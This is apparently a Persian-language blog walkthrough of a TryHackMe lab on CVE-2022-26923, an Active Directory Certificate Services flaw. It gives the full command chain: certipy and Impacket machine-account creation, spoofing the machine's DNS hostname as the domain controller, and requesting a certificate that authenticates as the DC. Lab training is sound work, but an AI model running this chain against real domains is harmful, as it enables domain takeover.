CVE-2022-26923 | TryHackMe – انجمن DEV

سلام!
امروز ما CVE-2022-26923 را پوشش خواهیم داد.
CVSS نسخه 3
امتیاز پایه: 8.8
بردار: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
شدت: زیاد
به CVE-2022-26923 TryHackMe خوش آمدید. امروز تصمیم گرفتم در مورد خدمات گواهی اکتیو دایرکتوری بیاموزم و فکر می کنم که این راهنما فرصت خوبی بود. من certipy را کشف کردم و روی nmap و Impacket تمرین کردم
addcomputer.py.
🔗 لینک به walkthorugh: https://tryhackme.com/r/room/cve202226923
🡡 سختی: آسان
⚙️ ابزار:
💭 توجه: $Target_IP= IP ماشین
برخی از اسکرین شات ها عمدا حذف شدند. من واقعاً شما را تشویق می کنم که اگر به حمایت نیاز دارید یا فقط برای گفتن نظر دارید، نظر بدهید print("Hello world")
. 😄
در GitHub من اطلاعات بیشتری در مورد آن پیدا خواهید کرد مایکروسافت ADCS.
🪜 مراحلی که من دنبال کردم (پس از استقرار دستگاه:
نام DNS و IP دستگاه را به آن اضافه کنید /etc/hosts
اسکن nmap را اجرا کنیدnmap -A -Pn $Target_IP
پورت های 88 و 389 باز هستند.
-88 برای سیستم احراز هویت Kerberos استفاده می شود
-389 برای ایجاد اتصالات LDAP است تا کاربران بتوانند به منابع شبکه محافظت شده دسترسی داشته باشند. اتصالات ایجاد شده از طریق این پورت رمزگذاری نشده است.
نام Enterprise CA را دریافت کنیدcertipy find -u thm@lunar.eruca.com -p Password1@ -dc-ip $Target_IP
تولید گواهی آزمایشی
certipy req -username thm@lunar.eruca.com -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP
بررسی کنید که این گواهی معتبر است و می تواند برای احراز هویت Kerberos استفاده شود
certipy auth -pfx thm.pfx
یک کامپیوتر به دامنه اضافه کنید
python3 addcomputer.py 'lunar.eruca.com/thm:Password1@' -method LDAPS -computer-name 'THMPC' -computer-pass 'Password1@' -dc-ip $Target_IP
یک گواهی برای رایانه جدید ایجاد کنید
certipy req -username THMPC$ -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP -template Machine
تأیید کنید که گواهی معتبر است
certipy auth -pfx thmpc.pfx
SSH به دستگاه
ssh lunar.eruca.com\\thm@lundc
Powershell را راه اندازی کنید
powershell
ویژگی های فعلی را از شیء AD کامپیوتر ما دریافت کنید
Get-ADComputer THMPC -properties dnshostname,serviceprincipalname
ویژگی DNS hostname را به DC به روز کنید
Set-ADComputer THMPC -ServicePrincipalName @{}
ویژگی DNS hostname را روی DC تنظیم کنید
Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com
بررسی کنید که تغییرات ایجاد شده است
Get-ADComputer THMPC -properties dnshostname,serviceprincipalname
جعل گواهی مخرب:
-
درخواست گواهی جدید
certipy req -username THMPC$ -password Password1@ -ca LUNAR-LUNDC-CA -target lundc.lunar.eruca.com -template Machine
certipy auth -pfx lundc.pfx
و ما پرچم داریم!